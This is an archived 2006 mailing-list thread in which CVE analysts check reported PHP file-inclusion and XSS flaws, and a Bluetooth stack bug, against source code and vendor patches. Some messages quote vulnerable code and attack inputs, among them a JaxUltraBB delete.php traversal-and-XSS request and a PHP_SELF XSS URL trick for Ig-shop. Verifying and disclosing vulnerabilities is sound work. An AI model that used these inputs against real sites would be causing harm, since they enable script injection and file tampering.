heinbockel at mitre.org 781-271-2615 From coley at mitre.org Mon Oct 23 15:57:40 2006 From: coley at mitre.org (Steven M. Christey) Date: Mon, 23 Oct 2006 15:57:40 -0400 (EDT) Subject: [VIM] Source VERIFY - speedberg RFI Message-ID: <200610231957.k9NJvelx025032@faron.mitre.org> Researcher: k1tk4t Issue: speedberg 1.2beta1 RFI http://www.securityfocus.com/archive/1/archive/1/449468/100/0/threaded k1tk4t lists the following vulnerable files: entrancePage.tpl.php generalToolBox.tlb.php myToolBox.tlb.php scriplet.inc.php simplePage.tpl.php speedberg.class.php standardPage.tpl.php Source code inspection of the 1.2beta1 package (URL referenced in the original advisory) shows that all the aforementioned files have the following code in the first line: require_once($SPEEDBERG_PATH."include/speedberg.class.php"); speedberg.class.php itself has: require_once($SPEEDBERG_PATH."config/general.inc.php"); require_once($SPEEDBERG_PATH."include/settings.inc.php"); require_once($SPEEDBERG_PATH."include/sitemap.class.php"); - Steve From coley at linus.mitre.org Mon Oct 23 18:04:09 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 23 Oct 2006 18:04:09 -0400 (EDT) Subject: [VIM] SecureWorks Research Client Advisory: Multiple Vendor Bluetooth Memory Stack Corruption Vulnerability In-Reply-To: <200610180213.k9I2DFoo024483@faron.mitre.org> References: <200610180213.k9I2DFoo024483@faron.mitre.org> Message-ID: I've done a little bit more investigation but still don't have 100% proof of acknowledgement for the latest report. > The SecureWorks advisory speaks of a "flaw" and "memory stack > corruption" but do not refer to this as a buffer overflow. The > affected driver versions go up to 4.00.35. > > They include this as a cross-reference: > > Buffer Overrun in Toshiba Bluetooth Stack for Windows > http://trifinite.org/trifinite_advisory_toshiba.html > > This document, published in June, only specifies versions up to > 4.0.23, and it specifically states that there is a buffer overflow, > and it even lists the attack vectors involving L2CAP Echo Requests. > > So - is there one bug or 2? > > The Toshiba URL they refer to includes a "PC Bluetooth Stack Security > Patch 2" whose Details document says "Fix L2CAP echo issue" (it also > mentions OBEX directory traversal but that is outside this particular > discussion). I decided to regard this as sufficient proof of vendor acknowledgement for the June trifinite issue (CVE-2006-3146) since the L2CAP lines up and the original researchers imply that they contacted Toshiba before disclosure. The OBEX directory traversal issue is probably KF's report (CVE-2006-0212). > There's also a "PC Bluetooth Stack" section whose Details document > says "Security fix", but the phrase "Bluetooth Stack 4.00.36(T)" seems > to imply that 4.00.36 is also affected, which is inconsistent with the > SecureWorks advisory. This inconsistency has not been resolved, although at this point it seems like they're reporting a different issue than the L2CAP problem, so I'm treating it differently (CVE-2006-5405). - Steve From coley at linus.mitre.org Tue Oct 24 14:09:11 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 24 Oct 2006 14:09:11 -0400 (EDT) Subject: [VIM] Vendor ACK for LearnCenter XSS (CVE-2006-4540) Message-ID: Received in CVE email. No Jericho, he didn't include version information. I'll follow up and double-check to ensure it's distributable and not just site-specific. - Steve =================================================== Date: Mon, 23 Oct 2006 12:04:43 -0400 From: Andy Wiener To: cve at mitre.org Subject: Vulnerability patched Learn.com has installed a patch to fix the vulnerability that your website posted. I would appreciate it if you could have someone retest it, and update the announcement on your site. The link to the announcement is: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4540 Regards, Andy Wiener Director of Hosting Operations From coley at linus.mitre.org Tue Oct 24 14:38:16 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 24 Oct 2006 14:38:16 -0400 (EDT) Subject: [VIM] PHP file inclusions in PHP Developer Library 1.5.3 (some disputed) In-Reply-To: <224FBC6B814DBD4E9B9E293BE33A10DC0146D456@IMCSRV5.MITRE.ORG> References: <224FBC6B814DBD4E9B9E293BE33A10DC0146D456@IMCSRV5.MITRE.ORG> Message-ID: On Mon, 23 Oct 2006, Heinbockel, Bill wrote: > The distribution as of 20061023 does not contain a file called > Description.php. It does, however, contain a Description file > (no file extension) which does contain the reported line (line 253): > > include ($lib_dir . "sqlstorage.class.php"); > > However there is no clear way to get this file to be handled by the > PHP interpreter (mod_php or similar). I took a closer look at this since it was so weird. The "Description" file is basically a bunch of documentation for various functions within the library. It is free-form text and there are no "" specifiers (or " JaxUltraBB <= 2.0 (delete.php) Defaced Exploit http://www.milw0rm.com/exploits/2616 XF:jaxultrabb-delete-file-include(29711) BID:20679 In the delete.php file in JUBB 2.0 (lines 22-38): $forum = $_GET['forum']; $topicsfile = file_get_contents("topics/$forum"."topics.JaxSQL"); $topics = explode("{TOPIC}", $topicsfile); foreach ($topics as $topic) { if ($topic != "") { if ($topic == $topicpulled) { // topic is the desired one to delete //just sit here... } else { $contents = $contents . "{TOPIC}" . $topic; } } } $openfile = fopen("topics/".$forum."topics.JaxSQL", "w"); fwrite($openfile, $contents); fclose($openfile); $contents is not defined before being used on line 31, when building up a concatenation of lines from the $forum file to "delete" the to-be-deleted topic. In the exploit: delete.php?modtype=%3Cimg%20src=img/admin.jpg%3E&forum=../index.php%00& contents=[XSS] The modtype passed an "attempting hacking" check, while the forum specifies the "topics" file (this is vulnerable to directory traversal, but only file modification can occur in conjunction with the code injection). End result: whatever the value of the $contents variable is initially is prepended to the $forum file. William Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 From heinbockel at mitre.org Wed Oct 25 10:47:47 2006 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Wed, 25 Oct 2006 10:47:47 -0400 Subject: [VIM] CONFIRM: OTSCMS file inclusions - PHP5 __autoload Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC0146D8E7@IMCSRV5.MITRE.ORG> http://www.milw0rm.com/exploits/2622 OTSCMS is written for PHP 5. The vulnerable code for each of the 3 exploits resembles the following (from 1.4.0): // function for automatic loading class function __autoload($class) { require_once($GLOBALS['config']['otscms']['directories']['classes'] . $class . '.php'); } In PHP5, the __autoload function is used to signal the PHP interpreter how to load an unrecognized PHP object. So, if there is any class used later that is not in an already included file, the __autoload function will be automatically called. So on line 38, there is: // initializes SQL database connection $sql = new SQL($config['sql']['host'], $config['sql']['user'], $config['sql']['password'], $config['sql']['database'], $config['sql']['prefix']); Therefore, __autoload will be called when the interpreter reaches this line. William Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 From coley at mitre.org Thu Oct 26 12:17:39 2006 From: coley at mitre.org (Steven M. Christey) Date: Thu, 26 Oct 2006 12:17:39 -0400 (EDT) Subject: [VIM] Source VERIFY: PHP Generator of Object SQL Database RFI Message-ID: <200610261617.k9QGHd9j023317@faron.mitre.org> Researcher: xorontr gmail com Post: PHP Generator of Object SQL Database (path) Remote File Include Vulnerability http://www.securityfocus.com/archive/1/archive/1/449475/100/0/threaded function.php3 begins with this code: MISC:http://www.milw0rm.com/exploits/2596 Researcher says "langage" parameter, but apparently some vuln DBs say "language". Source inspection by a senior CVE analyst showed that it is "langage" and there is no "language". - Steve From coley at mitre.org Tue Oct 31 15:53:26 2006 From: coley at mitre.org (Steven M. Christey) Date: Tue, 31 Oct 2006 15:53:26 -0500 (EST) Subject: [VIM] Ig-shop change_pass.php XSS - 2 vectors Message-ID: <200610312053.k9VKrQ8C006058@faron.mitre.org> There's a slightly confusing discrepancy in SECTRACK:1017130 and BID:20768, in which the description mentions the "id" parameter. However, the raw source, included verbatim in the SECTRACK, provides an exploit using the action parameter. I dug up the source code and figured out that both vectors are valid. In version 1.4 from sourceforge, dated 2003, change_pass.php has: > So, that's the "id" vector. And, for $action we have: if($action=="1") { ... } else { ?>
So, as long as action is not "1", the query string is dumped into the form. This takes care of the action parameter, in the sense that it's not "1" and is part of the query string. I don't know what the original researcher's intention was with listing the Validate() function. It doesn't seem to contain any of that DOM-based XSS stuff, and it's only activated when the user presses Submit. There might be some other issues elsewhere in the code, such as where action is 1, but I didn't investigate further. - Steve From coley at mitre.org Tue Oct 31 17:16:24 2006 From: coley at mitre.org (Steven M. Christey) Date: Tue, 31 Oct 2006 17:16:24 -0500 (EST) Subject: [VIM] Likely vendor fix for Faq Administrator 2.1b Message-ID: <200610312216.k9VMGOG2007661@faron.mitre.org> Reference: MISC:http://www.milw0rm.com/exploits/2678 Faq Admninistrator 3.0 was apparently released today, at the same URL as mentioned in the milw0rm page. Many files are dated Oct 31. The "update.txt" file says: This is a security patch release! ... A bug has been found that may allow code to be ran on your system. ... 1) DELETE: c2.php c3.php blank.php faqsend.php faq_reply.php hist_replycount.php mail.php reply_count.php total_asked.php Using the powerful technique of URL guessing, I was able to download the older 2.1b version. faq_reply.php has this code: include ("$email"); grep showed that this was the only place where a variable was used in an include, require, or open statement. Given the date and the solution, I think this will be treated as sufficient acknowledgement by CVE. But, now there's a question of the other files that got deleted. Based on *casual* inspection, it appears that the other files were merged into two patch files. These deleted files only contained 6 to 30 lines each. It's not clear whether this combination was defensive or not, although there did seem to be some possibility of variable modification, although some files such as blank.php didn't have any code at all. I didn't look too closely. - Steve From smoore at securityglobal.net Tue Oct 31 17:26:28 2006 From: smoore at securityglobal.net (Stuart Moore) Date: Tue, 31 Oct 2006 17:26:28 -0500 Subject: [VIM] Ig-shop change_pass.php XSS - 2 vectors In-Reply-To: <200610312053.k9VKrQ8C006058@faron.mitre.org> References: <200610312053.k9VKrQ8C006058@faron.mitre.org> Message-ID: <4547CD94.8010207@securityglobal.net> Steve, When we initially fired up the code, the 'action' parameter vector didn't work as advertised but code inspection led us to the 'id' parameter vector (I sort of "assumed" that is what the reporter meant to report). The $PHP_SELF variable returns the script name, but not the query parameters (manual says: "The filename of the currently executing script, relative to the document root"). So the 'action' parameter shouldn't be a valid exploit vector. But, it looks like you may be able to exploit via the 'email' parameter when used in a POST request because of this line: echo "





The password has been successfully changed!

Back to User Details

"; I didn't test that part, however. Stuart Steven M. Christey wrote: > There's a slightly confusing discrepancy in SECTRACK:1017130 and > BID:20768, in which the description mentions the "id" parameter. > However, the raw source, included verbatim in the SECTRACK, provides > an exploit using the action parameter. > > I dug up the source code and figured out that both vectors are valid. > > In version 1.4 from sourceforge, dated 2003, change_pass.php has: > >> > > So, that's the "id" vector. > > And, for $action we have: > > if($action=="1") > { > ... > } > else > { > ?> > > > > So, as long as action is not "1", the query string is dumped into the > form. This takes care of the action parameter, in the sense > that it's not "1" and is part of the query string. > > I don't know what the original researcher's intention was with listing > the Validate() function. It doesn't seem to contain any of that > DOM-based XSS stuff, and it's only activated when the user presses > Submit. > > There might be some other issues elsewhere in the code, such as where > action is 1, but I didn't investigate further. > > - Steve > From coley at linus.mitre.org Tue Oct 31 17:59:38 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 31 Oct 2006 17:59:38 -0500 (EST) Subject: [VIM] Ig-shop change_pass.php XSS - 2 vectors In-Reply-To: <4547CD94.8010207@securityglobal.net> References: <200610312053.k9VKrQ8C006058@faron.mitre.org> <4547CD94.8010207@securityglobal.net> Message-ID: Stuart, For a second I thought I'd had a huge misunderstanding about PHP_SELF, then things became OK. I guess there's a particular subtlety that hasn't reached widespread awareness. > The $PHP_SELF variable returns the script name, but not the query > parameters (manual says: "The filename of the currently executing > script, relative to the document root"). So the 'action' parameter > shouldn't be a valid exploit vector. The population of PHP_SELF seems to get confused sometimes, or at least returns unexpected values. This might be related to how Apache parses PHP requests, I don't know. Take an example abc.php (tested on PHP 4.3 on Apache): echo $_SERVER['PHP_SELF']; Calling this: http://url/abc.php/param= gives the XSS dialog we all know and love. Looks like the request is parsed into "before ?" and "after ?", and anything before "?" is dumped into PHP_SELF. So, for ig-shop, what happens if you use something like: http://site.com/ig-shop/change_pass.php/action=">[etc. etc. etc] i.e., a "/" between change_pass.php and action? - Steve From smoore at securityglobal.net Tue Oct 31 20:15:21 2006 From: smoore at securityglobal.net (Stuart Moore) Date: Tue, 31 Oct 2006 20:15:21 -0500 Subject: [VIM] Ig-shop change_pass.php XSS - 2 vectors In-Reply-To: References: <200610312053.k9VKrQ8C006058@faron.mitre.org> <4547CD94.8010207@securityglobal.net> Message-ID: <4547F528.4020300@securityglobal.net> Steve, You are right, this works: change_pass.php/action=">[etc. etc. etc] It is possible that the following could work on some Apache configs (especially if mod_rewrite is rewriting the URL): change_pass.php?action=">[etc. etc. etc] Either way, the functioning of $PHP_SELF does not seem consistent w/ the PHP documentation. I noticed that the variable has a long history of bugs and documentation inconsistencies ... Stuart Steven M. Christey wrote: > Stuart, > > For a second I thought I'd had a huge misunderstanding about PHP_SELF, > then things became OK. I guess there's a particular subtlety that hasn't > reached widespread awareness. > >> The $PHP_SELF variable returns the script name, but not the query >> parameters (manual says: "The filename of the currently executing >> script, relative to the document root"). So the 'action' parameter >> shouldn't be a valid exploit vector. > > The population of PHP_SELF seems to get confused sometimes, or at least > returns unexpected values. This might be related to how Apache parses PHP > requests, I don't know. > > Take an example abc.php (tested on PHP 4.3 on Apache): > > echo $_SERVER['PHP_SELF']; > > Calling this: > > http://url/abc.php/param= > > gives the XSS dialog we all know and love. > > Looks like the request is parsed into "before ?" and "after ?", and > anything before "?" is dumped into PHP_SELF. > > So, for ig-shop, what happens if you use something like: > > http://site.com/ig-shop/change_pass.php/action=">[etc. etc. etc] > > i.e., a "/" between change_pass.php and action? > > - Steve >